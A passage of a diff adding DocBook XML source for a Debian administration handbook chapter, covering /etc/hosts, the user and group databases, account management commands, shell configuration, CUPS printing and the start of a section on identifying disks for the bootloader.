+</programlisting>
+
+        <para>Note that the <filename>/etc/resolv.conf</filename> file
+        may be handled automatically (and overwritten) when the
+        network is managed by NetworkManager or configured via
+        DHCP.</para>
+
+      </section>
+      <section id="sect.etc-hosts">
+        <title>The <filename>/etc/hosts</filename> file</title>
+        <indexterm><primary><filename>hosts</filename></primary></indexterm>
+        <indexterm><primary><filename>/etc/hosts</filename></primary></indexterm>
+
+	<para>If there is no name server on the local network, it is still
+	possible to establish a small table mapping IP addresses and
+	machine hostnames in the <filename>/etc/hosts</filename> file,
+	usually reserved for local network stations. The syntax of this
+	file is very simple: each line indicates a specific IP address
+	followed by the list of any associated names (the first being
+	“completely qualified”, meaning it includes the domain
+	name).</para>
+
+	<para>This file is available even during network outages or when
+	DNS servers are unreachable, but will only really be useful when
+	duplicated on all the machines on the network. The slightest
+	alteration in correspondence will require the file to be updated
+	everywhere. This is why <filename>/etc/hosts</filename> generally
+	only contains the most important entries.</para>
+
+	<para>This file will be sufficient for a small network not
+	connected to the Internet, but with 5 machines or more, it is
+	recommended to install a proper DNS server.</para>
+
+        <sidebar>
+          <title><emphasis>TIP</emphasis> Bypassing DNS</title>
+
+	  <para>Since applications check the
+	  <filename>/etc/hosts</filename> file before querying DNS, it is
+	  possible to include information in there that is different from
+	  what the DNS would return, and therefore to bypass normal
+	  DNS-based name resolution.</para>
+
+	  <para>This allows, in the event of DNS changes not yet
+	  propagated, to test access to a website with the intended name
+	  even if this name is not properly mapped to the correct IP
+	  address yet.</para>
+
+	  <para>Another possible use is to redirect traffic intended for a
+	  specific host to the localhost, thus preventing any
+	  communication with the given host. For example, hostnames of
+	  servers dedicated to serving ads could be diverted which would
+	  bypass these ads resulting in more fluid, less distracting,
+	  navigation.</para>
+        </sidebar>
+      </section>
+    </section>
+  </section>
+  <section id="sect.user-group-databases">
+    <title>User and Group Databases</title>
+    <indexterm><primary>user</primary><secondary>database</secondary></indexterm>
+    <indexterm><primary>group</primary><secondary>database</secondary></indexterm>
+    <indexterm><primary>database</primary><secondary>of users</secondary></indexterm>
+    <indexterm><primary>database</primary><secondary>of groups</secondary></indexterm>
+
+    <para>The list of users is usually stored in the
+    <filename>/etc/passwd</filename> file, while the
+    <filename>/etc/shadow</filename> file stores encrypted passwords. Both
+    are text files, in a relatively simple format, which can be read and
+    modified with a text editor. Each user is listed there on a line with
+    several fields separated with a colon
+    (“<literal>:</literal>”).</para>
+
+    <sidebar>
+      <title><emphasis>NOTE</emphasis> Editing system files</title>
+
+      <para>The system files mentioned in this chapter are all plain text
+      files, and can be edited with a text editor. Considering their
+      importance to core system functionality, it is always a good idea to
+      take extra precautions when editing system files. First, always make
+      a copy or backup of a system file before opening or altering it.
+      Second, on servers or machines where more than one person could
+      potentially access the same file at the same time, take extra steps
+      to guard against file corruption.</para>
+
+      <para>For this purpose, it is enough to use the
+      <command>vipw</command> command to edit the
+      <filename>/etc/passwd</filename> file, or <command>vigr</command> to
+      edit <filename>/etc/group</filename>. These commands lock the file in
+      question prior to running the text editor, (<command>vi</command> by
+      default, unless the <varname>EDITOR</varname> environment variable
+      has been altered). The <literal>-s</literal> option in these commands
+      allows editing the corresponding
+      <foreignphrase>shadow</foreignphrase> file.</para>
+    </sidebar>
+
+    <sidebar>
+      <title><emphasis>BACK TO BASICS</emphasis> Crypt, a one-way function</title>
+      <indexterm><primary>crypt</primary></indexterm>
+
+      <para><command>crypt</command> is a one-way function that transforms
+      a string (<varname>A</varname>) into another string
+      (<varname>B</varname>) in a way that <varname>A</varname> cannot be
+      derived from <varname>B</varname>. The only way to identify
+      <varname>A</varname> is to test all possible values, checking each
+      one to determine if transformation by the function will produce
+      <varname>B</varname> or not. It uses up to 8 characters as input
+      (string <varname>A</varname>) and generates a string of 13,
+      printable, ASCII characters (string <varname>B</varname>).</para>
+    </sidebar>
+    <section id="sect.etc-passwd">
+      <title>User List: <filename>/etc/passwd</filename></title>
+
+      <para>Here is the list of fields in the
+      <filename>/etc/passwd</filename> file:</para>
+      <indexterm><primary><command>passwd</command></primary></indexterm>
+      <indexterm><primary><filename>/etc/passwd</filename></primary></indexterm>
+      <indexterm><primary><literal>uid</literal></primary></indexterm>
+      <indexterm><primary><literal>gid</literal></primary></indexterm>
+      <indexterm><primary><literal>GECOS</literal></primary></indexterm>
+      <indexterm><primary><literal>login</literal></primary></indexterm>
+      <itemizedlist>
+        <listitem>
+	  <para>login, for example <literal>rhertzog</literal>;</para>
+        </listitem>
+        <listitem>
+	  <para>password: this is a password encrypted by a one-way
+	  function (<command>crypt</command>), relying on <literal>DES</literal>,
+	  <literal>MD5</literal>, <literal>SHA-256</literal> or
+	  <literal>SHA-512</literal>. The special value
+	  “<literal>x</literal>” indicates that the encrypted password
+	  is stored in <filename>/etc/shadow</filename>;</para>
+        </listitem>
+        <listitem>
+	  <para><literal>uid</literal>: unique number identifying each
+	  user;</para>
+        </listitem>
+        <listitem>
+	  <para><literal>gid</literal>: unique number for the user's main
+	  group (Debian creates a specific group for each user by
+	  default);</para>
+        </listitem>
+        <listitem>
+	  <para><literal>GECOS</literal>: data field usually containing the
+	  user's full name;</para>
+        </listitem>
+        <listitem>
+	  <para>login directory, assigned to the user for storage of their
+	  personal files (the environment variable <varname>$HOME</varname>
+	  generally points here);</para>
+        </listitem>
+        <listitem>
+	  <para>program to execute upon login. This is usually a command
+	  interpreter (shell), giving the user free rein. If you specify
+	  <command>/bin/false</command> (which does nothing and returns
+	  control immediately), the user cannot login.</para>
+        </listitem>
+      </itemizedlist>
+
+      <sidebar>
+        <title><emphasis>BACK TO BASICS</emphasis> Unix group</title>
+        <indexterm><primary>group</primary></indexterm>
+
+	<para>A Unix group is an entity including several users so that
+	they can easily share files using the integrated permission system
+	(by benefiting from the same rights). You can also restrict use of
+	certain programs to a specific group.</para>
+      </sidebar>
+    </section>
+    <section id="sect.etc-shadow">
+      <title>The Hidden and Encrypted Password File: <filename>/etc/shadow</filename></title>
+      <indexterm><primary><filename>shadow</filename></primary></indexterm>
+      <indexterm><primary><filename>/etc/shadow</filename></primary></indexterm>
+
+      <para>The <filename>/etc/shadow</filename> file contains the
+      following fields:</para>
+      <itemizedlist>
+        <listitem>
+	  <para>login;</para>
+        </listitem>
+        <listitem>
+	  <para>encrypted password;</para>
+        </listitem>
+        <listitem>
+	  <para>several fields managing password expiration.</para>
+        </listitem>
+      </itemizedlist>
+
+      <sidebar>
+        <title><emphasis>DOCUMENTATION</emphasis> <filename>/etc/passwd</filename>, <filename>/etc/shadow</filename> and <filename>/etc/group</filename> file formats</title>
+
+	<para>These formats are documented in the following man pages:
+	<citerefentry><refentrytitle>passwd</refentrytitle><manvolnum>5</manvolnum></citerefentry>,
+	<citerefentry><refentrytitle>shadow</refentrytitle><manvolnum>5</manvolnum></citerefentry>,
+	and
+	<citerefentry><refentrytitle>group</refentrytitle><manvolnum>5</manvolnum></citerefentry>.</para>
+      </sidebar>
+
+      <sidebar>
+        <title><emphasis>SECURITY</emphasis> <filename>/etc/shadow</filename> file security</title>
+
+	<para><filename>/etc/shadow</filename>, unlike its alter-ego,
+	<filename>/etc/passwd</filename>, cannot be read by regular users.
+	Any encrypted password stored in <filename>/etc/passwd</filename>
+	is readable by anybody; a cracker could try to “break” (or
+	reveal) a password by one of several “brute force” methods
+	which, simply put, guess at commonly used combinations of
+	characters. This attack — called a "dictionary attack" — is no
+	longer possible on systems using
+	<filename>/etc/shadow</filename>.</para>
+      </sidebar>
+    </section>
+    <section id="sect.account-modification">
+      <title>Modifying an Existing Account or Password</title>
+      <indexterm><primary><command>chsh</command></primary></indexterm>
+      <indexterm><primary><command>chfn</command></primary></indexterm>
+      <indexterm><primary><command>passwd</command></primary></indexterm>
+      <indexterm><primary><command>chage</command></primary></indexterm>
+      <indexterm><primary>password</primary></indexterm>
+
+      <para>The following commands allow modification of the information
+      stored in specific fields of the user databases:
+      <command>passwd</command> permits a regular user to change their
+      password, which in turn, updates the <filename>/etc/shadow</filename>
+      file; <command>chfn</command> (CHange Full Name), reserved for the
+      super-user (root), modifies the <literal>GECOS</literal> field.
+      <command>chsh</command> (CHange SHell) allows the user to change
+      their login shell, however available choices will be limited to those
+      listed in <filename>/etc/shells</filename>; the administrator, on the
+      other hand, is not bound by this restriction and can set the shell to
+      any program of their choosing.</para>
+
+      <para>Finally, the <command>chage</command> (CHange AGE) command
+      allows the administrator to change the password expiration settings
+      (the <literal>-l <replaceable>user</replaceable></literal> option
+      will list the current settings). You can also force the expiration of
+      a password using the <command>passwd -e
+      <replaceable>user</replaceable></command> command, which will require
+      the user to change their password the next time they log in.</para>
+    </section>
+    <section id="sect.disabling-account">
+      <title>Disabling an Account</title>
+      <indexterm><primary>Disable an account</primary></indexterm>
+      <indexterm><primary>account</primary><secondary>disable</secondary></indexterm>
+
+      <para>You may find yourself needing to “disable an account” (lock
+      out a user), as a disciplinary measure, for the purposes of an
+      investigation, or simply in the event of a prolonged or definitive
+      absence of a user. A disabled account means the user cannot login or
+      gain access to the machine. The account remains intact on the machine
+      and no files or data are deleted; it is simply inaccessible. This is
+      accomplished by using the command <command>passwd -l
+      <replaceable>user</replaceable></command> (lock). Re-enabling the
+      account is done in similar fashion, with the <literal>-u</literal>
+      option (unlock).</para>
+
+      <sidebar id="sidebar.intro-nss">
+        <title><emphasis>GOING FURTHER</emphasis> NSS and system databases</title>
+        <indexterm><primary>NSS</primary></indexterm>
+        <indexterm><primary>Name Service Switch</primary></indexterm>
+
+	<para>Instead of using the usual files to manage lists of users and
+	groups, you could use other types of databases, such as LDAP or
+	<command>db</command>, by using an appropriate NSS (Name Service
+	Switch) module. The modules used are listed in the
+	<filename>/etc/nsswitch.conf</filename> file, under the
+	<literal>passwd</literal>, <literal>shadow</literal> and
+	<literal>group</literal> entries. See <xref linkend="sect.config-nss" /> for a specific example of the use of
+	an NSS module by LDAP.</para>
+      </sidebar>
+    </section>
+    <section id="sect.etc-group">
+      <title>Group List: <filename>/etc/group</filename></title>
+
+      <para>Groups are listed in the <filename>/etc/group</filename> file,
+      a simple textual database in a format similar to that of the
+      <filename>/etc/passwd</filename> file, with the following
+      fields:</para>
+      <itemizedlist>
+        <listitem>
+	  <para>group name;</para>
+        </listitem>
+        <listitem>
+	  <para>password (optional): This is only used to join a group when
+	  one is not a usual member (with the <command>newgrp</command> or
+	  <command>sg</command> commands, see sidebar <xref linkend="sidebar.working-with-several-groups" />);</para>
+        </listitem>
+        <listitem>
+	  <para><literal>gid</literal>: unique group identification
+	  number;</para>
+        </listitem>
+        <listitem>
+	  <para>list of members: list of names of users who are members of
+	  the group, separated by commas.</para>
+        </listitem>
+      </itemizedlist>
+
+      <para></para>
+
+      <sidebar id="sidebar.working-with-several-groups">
+        <title><emphasis>BACK TO BASICS</emphasis> Working with several groups</title>
+        <indexterm><primary><command>newgrp</command></primary></indexterm>
+        <indexterm><primary><command>sg</command></primary></indexterm>
+        <indexterm><primary><command>id</command></primary></indexterm>
+        <indexterm><primary>group</primary><secondary>change</secondary></indexterm>
+
+	<para>Each user may be a member of many groups; one of them is
+	their “main group”. A user's main group is, by default, created
+	during initial user configuration. By default, each file that a
+	user creates belongs to them, as well as to their main group. This
+	is not always desirable; for example, when the user needs to work
+	in a directory shared by a group other than their main group. In
+	this case, the user needs to change their main group using one of
+	the following commands: <command>newgrp</command>, which starts a
+	new shell, or <command>sg</command>, which simply executes a
+	command using the supplied alternate group. These commands also
+	allow the user to join a group to which they do not belong. If the
+	group is password protected, they will need to supply the
+	appropriate password before the command is executed.</para>
+
+	<para>Alternatively, the user can set the <literal>setgid</literal>
+	bit on the directory, which causes files created in that directory
+	to automatically belong to the correct group. For more details, see
+	sidebar <xref linkend="sidebar.setgid-dir" />.</para>
+
+	<para>The <command>id</command> command displays the current state
+	of a user, with their personal identifier (<varname>uid</varname>
+	variable), current main group (<varname>gid</varname> variable),
+	and the list of groups to which they belong
+	(<varname>groups</varname> variable).</para>
+      </sidebar>
+      <indexterm><primary><filename>group</filename></primary></indexterm>
+      <indexterm><primary><filename>/etc/group</filename></primary></indexterm>
+
+      <para>The <command>addgroup</command> and <command>delgroup</command>
+      commands add or delete a group, respectively. The
+      <command>groupmod</command> command modifies a group's information
+      (its <literal>gid</literal> or identifier). The command
+      <command>gpasswd <replaceable>group</replaceable></command> changes
+      the password for the group, while the <command>gpasswd -r
+      <replaceable>group</replaceable></command> command deletes it.</para>
+      <indexterm><primary><command>addgroup</command></primary></indexterm>
+      <indexterm><primary><command>delgroup</command></primary></indexterm>
+      <indexterm><primary><command>groupmod</command></primary></indexterm>
+      <indexterm><primary><command>gpasswd</command></primary></indexterm>
+      <indexterm><primary>group</primary><secondary>creation</secondary></indexterm>
+      <indexterm><primary>creation</primary><secondary>of groups</secondary></indexterm>
+      <indexterm><primary>group</primary><secondary>deletion</secondary></indexterm>
+      <indexterm><primary>deletion of a group</primary></indexterm>
+
+      <sidebar>
+        <title><emphasis>TIP</emphasis> <command>getent</command></title>
+        <indexterm><primary><command>getent</command></primary></indexterm>
+
+	<para>The <command>getent</command> (get entries) command checks
+	the system databases the standard way, using the appropriate
+	library functions, which in turn call the NSS modules configured in
+	the <filename>/etc/nsswitch.conf</filename> file. The command takes
+	one or two arguments: the name of the database to check, and a
+	possible search key. Thus, the command <command>getent passwd
+	rhertzog</command> will give the information from the user database
+	regarding the user <literal>rhertzog</literal>.</para>
+      </sidebar>
+    </section>
+  </section>
+  <section id="sect.creating-accounts">
+    <title>Creating Accounts</title>
+    <indexterm><primary>account</primary><secondary>creation</secondary></indexterm>
+    <indexterm><primary>creation</primary><secondary>of user accounts</secondary></indexterm>
+
+    <para>One of the first actions an administrator needs to do when
+    setting up a new machine is to create user accounts. This is typically
+    done using the <command>adduser</command> command which takes a
+    user-name for the new user to be created, as an argument.</para>
+    <indexterm><primary><command>adduser</command></primary></indexterm>
+
+    <para>The <command>adduser</command> command asks a few questions
+    before creating the account, but its usage is fairly straightforward.
+    Its configuration file, <filename>/etc/adduser.conf</filename>,
+    includes all the interesting settings: it can be used to automatically
+    set a quota for each new user by creating a user template, or to change
+    the location of user accounts; the latter is rarely useful, but it
+    comes in handy when you have a large number of users and want to divide
+    their accounts over several disks, for instance. You can also choose a
+    different default shell.</para>
+
+    <sidebar>
+      <title><emphasis>BACK TO BASICS</emphasis> Quota</title>
+      <indexterm><primary>quota</primary></indexterm>
+
+      <para>The term “quota” refers to a limit on machine resources
+      that a user is allowed to use. This frequently refers to disk
+      space.</para>
+    </sidebar>
+
+    <para>The creation of an account populates the user's home directory
+    with the contents of the <filename>/etc/skel/</filename> template. This
+    provides the user with a set of standard directories and configuration
+    files.</para>
+    <indexterm><primary>group</primary><secondary>add a user</secondary></indexterm>
+    <indexterm><primary>add a user to a group</primary></indexterm>
+
+    <para>In some cases, it will be useful to add a user to a group (other
+    than their default “main” group) in order to grant them additional
+    permissions. For example, a user who is included in the
+    <emphasis>audio</emphasis> group can access audio devices (see sidebar
+    <xref linkend="sidebar.special-files" />). This can be achieved with a
+    command such as <command>adduser <replaceable>user</replaceable>
+    <replaceable>group</replaceable></command>.</para>
+
+    <sidebar id="sidebar.special-files">
+      <title><emphasis>BACK TO BASICS</emphasis> Device access permissions</title>
+      <indexterm><primary>device</primary><secondary>access permissions</secondary></indexterm>
+      <indexterm><primary>file</primary><secondary>special</secondary></indexterm>
+      <indexterm><primary>mode</primary><secondary>character</secondary></indexterm>
+      <indexterm><primary>mode</primary><secondary>block</secondary></indexterm>
+      <indexterm><primary>block, mode</primary></indexterm>
+      <indexterm><primary>character, mode</primary></indexterm>
+      <indexterm><primary>special, file</primary></indexterm>
+      <indexterm><primary><command>mknod</command></primary></indexterm>
+
+      <para>Each hardware peripheral device is represented under Unix with
+      a special file, usually stored in the file tree under
+      <filename>/dev/</filename> (DEVices). Two types of special files
+      exist according to the nature of the device: “character mode” and
+      “block mode” files, each mode allowing for only a limited number
+      of operations. While character mode limits interaction with
+      read/write operations, block mode also allows seeking within the
+      available data. Finally, each special file is associated with two
+      numbers (“major” and “minor”) that identify the device to the
+      kernel in a unique manner. Such a file, created by the
+      <command>mknod</command> command, simply contains a symbolic (and
+      more human-friendly) name.</para>
+
+      <para>The permissions of a special file map to the permissions
+      necessary to access the device itself. Thus, a file such as
+      <filename>/dev/mixer</filename>, representing the audio mixer, only
+      has read/write permissions for the root user and members of the
+      <literal>audio</literal> group. Only these users can operate the
+      audio mixer.</para>
+
+      <para>It should be noted that the combination of <emphasis role="pkg">udev</emphasis>, <emphasis role="pkg">consolekit</emphasis> and <emphasis role="pkg">policykit</emphasis> can add additional permissions to
+      allow users physically connected to the console (and not through the
+      network) to access to certain devices.</para>
+    </sidebar>
+  </section>
+  <section id="sect.shell-environment">
+    <title>Shell Environment</title>
+
+    <para>Command interpreters (or shells) can be a user's first
+    point of contact with the computer, and they must therefore be rather
+    friendly. Most of them use initialization scripts that allow
+    configuration of their behavior (automatic completion, prompt text,
+    etc.).</para>
+    <indexterm><primary>command line interface</primary></indexterm>
+    <indexterm><primary>command interpreter</primary></indexterm>
+    <indexterm><primary>shell</primary></indexterm>
+    <indexterm><primary><command>bash</command></primary></indexterm>
+
+    <para><command>bash</command>, the standard shell, uses the
+    <filename>/etc/bash.bashrc</filename> initialization script for
+    “interactive” shells, and <filename>/etc/profile</filename> for
+    “login” shells.</para>
+
+    <sidebar>
+      <title><emphasis>BACK TO BASICS</emphasis> Login shell and (non) interactive shell</title>
+
+      <para>In simple terms, a login shell is invoked when you login to
+      the console either locally or remotely via
+      <command>ssh</command>, or when you run an explicit <command>bash
+      --login</command> command. Regardless of whether it is a login shell
+      or not, a shell can be interactive (in an
+      <command>xterm</command>-type terminal for instance); or
+      non-interactive (when executing a script).</para>
+    </sidebar>
+
+    <sidebar>
+      <title><emphasis>DISCOVERY</emphasis> Other shells, other scripts</title>
+
+      <para>Each command interpreter has a specific syntax and its own
+      configuration files. Thus, <command>zsh</command> uses
+      <filename>/etc/zshrc</filename> and <filename>/etc/zshenv</filename>;
+      <command>tcsh</command> uses <filename>/etc/csh.cshrc</filename>,
+      <filename>/etc/csh.login</filename> and
+      <filename>/etc/csh.logout</filename>. The man pages for these
+      programs document which files they use.</para>
+      <indexterm><primary><command>zsh</command></primary></indexterm>
+      <indexterm><primary><command>tcsh</command></primary></indexterm>
+    </sidebar>
+
+    <para>For <command>bash</command>, it is useful to activate
+    “automatic completion” in the <filename>/etc/bash.bashrc</filename>
+    file (simply uncomment a few lines).</para>
+
+    <sidebar>
+      <title><emphasis>BACK TO BASICS</emphasis> Automatic completion</title>
+      <indexterm><primary>automatic completion</primary></indexterm>
+
+      <para>Many command interpreters provide a completion feature, which
+      allows the shell to automatically complete a partially typed command
+      name or argument when the user hits the <keycap>Tab</keycap> key.
+      This lets users work more efficiently and be less error-prone.</para>
+
+      <para>This function is very powerful and flexible. It is possible to
+      configure its behavior according to each command. Thus, the first
+      argument following <command>apt</command> will be proposed
+      according to the syntax of this command, even if it does not match
+      any file (in this case, the possible choices are
+      <literal>install</literal>, <literal>remove</literal>,
+      <literal>upgrade</literal>, etc.).</para>
+    </sidebar>
+
+    <sidebar>
+      <title><emphasis>BACK TO BASICS</emphasis> The tilde, a shortcut to HOME</title>
+      <indexterm><primary>~</primary></indexterm>
+      <indexterm><primary>tilde</primary></indexterm>
+
+      <para>The tilde is often used to indicate the directory to which the
+      environment variable, <varname>HOME</varname>, points (being the
+      user's home directory, such as <filename>/home/rhertzog/</filename>).
+      Command interpreters automatically make the substitution:
+      <filename>~/hello.txt</filename> becomes
+      <filename>/home/rhertzog/hello.txt</filename>.</para>
+
+      <para>The tilde also allows access to another user's home directory.
+      Thus, <filename>~rmas/bonjour.txt</filename> is synonymous with
+      <filename>/home/rmas/bonjour.txt</filename>.</para>
+    </sidebar>
+
+    <para>In addition to these common scripts, each user can create their
+    own <filename>~/.bashrc</filename> and
+    <filename>~/.bash_profile</filename> to configure their shell. The most
+    common changes are the addition of aliases; these are words that are
+    automatically replaced with the execution of a command, which makes it
+    faster to invoke that command. For instance, you could create the
+    <literal>la</literal> alias for the command <command>ls -la |
+    less</command> command; then you only have to type
+    <command>la</command> to inspect the contents of a directory in
+    detail.</para>
+
+    <sidebar>
+      <title><emphasis>BACK TO BASICS</emphasis> Environment variables</title>
+      <indexterm><primary>environment</primary><secondary>environment variable</secondary></indexterm>
+      <indexterm><primary>variable, environment</primary></indexterm>
+
+      <para>Environment variables allow storage of global settings for the
+      shell or various other programs called. They are contextual (each
+      process has its own set of environment variables) but inheritable.
+      This last characteristic offers the possibility for a login shell to
+      declare variables which will be passed down to all programs it
+      executes.</para>
+    </sidebar>
+
+    <para>Setting default environment variables is an important element of
+    shell configuration. Leaving aside the variables specific to a shell,
+    it is preferable to place them in the
+    <filename>/etc/environment</filename> file, since it is used by the
+    various programs likely to initiate a shell session. Variables
+    typically defined there include <varname>ORGANIZATION</varname>, which
+    usually contains the name of the company or organization, and
+    <varname>HTTP_PROXY</varname>, which indicates the existence and
+    location of an HTTP proxy.</para>
+
+    <sidebar>
+      <title><emphasis>TIP</emphasis> All shells configured identically</title>
+
+      <para>Users often want to configure their login and interactive
+      shells in the same way. To do this, they choose to interpret (or
+      “source”) the content from <filename>~/.bashrc</filename> in the
+      <filename>~/.bash_profile</filename> file. It is possible to do the
+      same with files common to all users (by calling
+      <filename>/etc/bash.bashrc</filename> from
+      <filename>/etc/profile</filename>).</para>
+    </sidebar>
+  </section>
+  <section id="sect.config-printing">
+    <title>Printer Configuration</title>
+    <indexterm><primary>configuration</primary><secondary>printing</secondary></indexterm>
+    <indexterm><primary>printing</primary><secondary>configuration</secondary></indexterm>
+
+    <para>Printer configuration used to cause a great many headaches for
+    administrators and users alike. These headaches are now mostly a thing
+    of the past, thanks to <emphasis role="pkg">cups</emphasis>, the free print server using the IPP
+    protocol (Internet Printing Protocol).</para>
+    <indexterm><primary>IPP</primary></indexterm>
+    <indexterm><primary>Internet Printing Protocol</primary></indexterm>
+    <indexterm><primary><command>cups</command></primary></indexterm>
+
+    <para>This program is divided over several Debian packages: <emphasis role="pkg">cups</emphasis> is the central print server; <emphasis role="pkg">cups-bsd</emphasis> is a compatibility layer allowing use of
+    commands from the traditional BSD printing system
+    (<command>lpd</command> daemon, <command>lpr</command> and
+    <command>lpq</command> commands, etc.); <emphasis role="pkg">cups-client</emphasis> contains a group of programs to
+    interact with the server (block or unblock a printer, view or delete
+    print jobs in progress, etc.); and finally, <emphasis role="pkg">printer-driver-gutenprint</emphasis> contains a collection of
+    additional printer drivers for <command>cups</command>.</para>
+    <indexterm><primary><command>lpr</command></primary></indexterm>
+    <indexterm><primary><command>lpd</command></primary></indexterm>
+    <indexterm><primary><command>lpq</command></primary></indexterm>
+
+    <sidebar>
+      <title><emphasis>COMMUNITY</emphasis> CUPS</title>
+      <indexterm><primary>CUPS</primary></indexterm>
+      <indexterm><primary>Common Unix Printing System</primary></indexterm>
+
+      <para>CUPS (Common Unix Printing System) is a project (and a trademark)
+      managed by Apple, Inc.
+      <ulink type="block" url="http://www.cups.org/" /></para>
+    </sidebar>
+
+    <para>After installation of these different packages,
+    <command>cups</command> is administered easily through a web
+    interface accessible at the local address:
+    <literal>http://localhost:631/</literal>. There you can add
+    printers (including network printers), remove, and administer
+    them.  You can also administer <command>cups</command> with the
+    graphical interface provided by the desktop environment.  Finally,
+    there is also the <command>system-config-printer</command>
+    graphical interface (from the Debian package of the same
+    name).</para>
+    <indexterm><primary><command>cups</command></primary><secondary>administration</secondary></indexterm>
+
+    <sidebar>
+      <title><emphasis>NOTE</emphasis> Obsolescence of <filename>/etc/printcap</filename></title>
+
+      <para><emphasis>cups</emphasis> no longer uses the
+      <filename>/etc/printcap</filename> file, which is now obsolete.
+      Programs that rely upon this file to get a list of available printers
+      will, thus, fail. To avoid this problem, delete this file and make it
+      a symbolic link (see sidebar <xref linkend="sidebar.symbolic-link" />)
+      to <filename>/run/cups/printcap</filename>, which is maintained
+      by <emphasis>cups</emphasis> to ensure compatibility.</para>
+      <indexterm><primary><filename>printcap</filename></primary></indexterm>
+    </sidebar>
+  </section>
+  <section id="sect.config-bootloader">
+    <title>Configuring the Bootloader</title>
+    <indexterm><primary>loader</primary><secondary>bootloader</secondary></indexterm>
+    <indexterm><primary>bootloader</primary></indexterm>
+
+    <para>It is probably already functional, but it is always good to know
+    how to configure and install the bootloader in case it disappears from
+    the Master Boot Record. This can occur after installation of another
+    operating system, such as Windows. The following information can also
+    help you to modify the bootloader configuration if needed.</para>
+
+    <sidebar>
+      <title><emphasis>BACK TO BASICS</emphasis> Master boot record</title>
+      <indexterm><primary>MBR</primary></indexterm>
+      <indexterm><primary>Master Boot Record</primary></indexterm>
+
+      <para>The Master Boot Record (MBR) occupies the first 512 bytes of
+      the first hard disk, and is the first thing loaded by the BIOS to
+      hand over control to a program capable of booting the desired
+      operating system. In general, a bootloader gets installed in the MBR,
+      removing its previous content.</para>
+    </sidebar>
+    <section id="sect.identify-disks">
+      <title>Identifying the Disks</title>
+
+      <sidebar>
+        <title><emphasis>CULTURE</emphasis> <emphasis>udev</emphasis> and <filename>/dev/</filename></title>
+
+	<para>The <filename>/dev/</filename> directory traditionally houses
+	so-called “special” files, intended to represent system
+	peripherals (see sidebar <xref linkend="sidebar.special-files" />). Once upon a time, it used to contain
+	all special files that could potentially be used. This approach had a number
+	of drawbacks among which the fact that it restricted the number of devices
+	that one could use (due to the hardcoded list of names), and that it was
+	impossible to know which special files were actually useful.</para>
+
+	<para>Nowadays, the management of special files is entirely
+	dynamic and matches better the nature of hot-swappable computer
+	devices. The kernel cooperates with <emphasis>udev</emphasis> to
+	create and delete them as needed when the corresponding devices
+	appear and disappear.  For this reason, <filename>/dev/</filename>
+	doesn't need to be persistent and is thus a RAM-based filesystem
+	that starts empty and contains only the relevant entries.</para>
+
+	<para>The kernel communicates lots of information about any
+	newly added device and hands out a pair of major/minor numbers
+	to identify it. With this <command>udevd</command> can create
+	the special file under the name and with the permissions that
+	it wants. It can also create aliases and perform additional
+	actions (such as initialization or registration
+	tasks). <command>udevd</command>'s behavior is driven by a
+	large set of (customizable) rules.</para>
+
+	<para>With dynamically assigned names, you can thus keep the same name
+	for a given device, regardless of the connector used or the connection order, which is
+	especially useful when you use various USB peripherals. The
+	first partition on the first hard drive can then be called
+	<filename>/dev/sda1</filename> for backwards compatibility, or
+	<filename>/dev/root-partition</filename> if you prefer, or even
+	both at the same time since <command>udevd</command> can be
+	configured to automatically create a symbolic link.</para>
+
+	<para>In ancient times, some kernel modules did automatically
+	load when you tried to access the corresponding device file.
+	This is no longer the case, and the peripheral's special file
+	no longer exists prior to loading the module; this is no big
+	deal, since most modules are loaded on boot thanks to
+	automatic hardware detection. But for undetectable peripherals
+	(such as very old disk drives or PS/2 mice), this doesn't
+	work. Consider adding the modules, <literal>floppy</literal>,
+	<literal>psmouse</literal> and <literal>mousedev</literal> to
+	<filename>/etc/modules</filename> in order to force loading
+	them on boot.</para>
+      </sidebar>
+
+      <indexterm><primary>hard drive, names</primary></indexterm>
+      <indexterm><primary>names</primary><secondary>of hard drives</secondary></indexterm>
+
+      <para>Configuration of the bootloader must identify the
+      different hard drives and their partitions. Linux uses “block”
+      special files stored in the <filename>/dev/</filename>
+      directory, for this purpose.  Since Debian <emphasis role="distribution">Squeeze</emphasis>, the naming scheme for
+      hard drives has been unified by the Linux kernel, and all hard
+      drives (IDE/PATA, SATA, SCSI, USB, IEEE 1394) are now
+      represented by <filename>/dev/sd*</filename>.</para>
+
+      <para>Each partition is represented by its number on the disk on
+      which it resides: for instance, <filename>/dev/sda1</filename> is the
+      first partition on the first disk, and <filename>/dev/sdb3</filename>
+      is the third partition on the second disk.</para>
+
+      <indexterm><primary>partition</primary><secondary>primary</secondary></indexterm>
+      <indexterm><primary>partition</primary><secondary>extended</secondary></indexterm>
+      <indexterm><primary>partition</primary><secondary>secondary</secondary></indexterm>
+      <indexterm><primary>partition table</primary><secondary>MS-DOS format</secondary></indexterm>
+      <para>The PC architecture (or “i386”, including its younger
+      cousin “amd64”) has long been limited to using the “MS-DOS”
+      partition table format, which only allows four “primary”
+      partitions per disk. To go beyond this limitation under this
+      scheme, one of them has to be created as an “extended”
+      partition, and it can then contain additional “secondary”
+      partitions. These secondary partitions are numbered from 5. Thus
+      the first secondary partition could be
+      <filename>/dev/sda5</filename>, followed by
+      <filename>/dev/sda6</filename>, etc.</para>
+
+      <para>Another restriction of the MS-DOS partition table format is
+      that it only allows disks up to 2 TiB in size, which is becoming
+      a real problem with recent disks.</para>
+
+      <indexterm><primary>GPT</primary><secondary>partition table format</secondary></indexterm>
+      <indexterm><primary>partition table</primary><secondary>GPT format</secondary></indexterm>
+      <para>A new partition table format called GPT loosens these
+      constraints on the number of partitions (it allows up to 128
+      partitions when using standard settings) and on the size of the
+      disks (up to 8 ZiB, which is more than 8 billion terabytes).  If
+      you intend to create many physical partitions on the same disk,
+      you should therefore ensure that you are creating the partition table
+      in the GPT format when partitioning your disk.</para>
+
+      <para>It is not always easy to remember what disk is connected to
+      which SATA controller, or in third position in the SCSI chain,
+      especially since the naming of hotplugged hard drives (which includes
+      among others most SATA disks and external disks) can change from one
+      boot to another. Fortunately, <command>udev</command> creates, in
+      addition to <filename>/dev/sd*</filename>, symbolic links with a
+      fixed name, which you could then use if you wished to identify a hard
+      drive in a non-ambiguous manner. These symbolic links are stored in
+      <filename>/dev/disk/by-id</filename>. On a machine with two physical
+      disks, for example, one could find the following:</para>
+
+      <screen><computeroutput>mirexpress:/dev/disk/by-id# </computeroutput><userinput>ls -l
+</userinput><computeroutput>total 0
+lrwxrwxrwx 1 root root  9 23 jul. 08:58 ata-STM3500418AS_9VM3L3KP -&gt; ../../sda
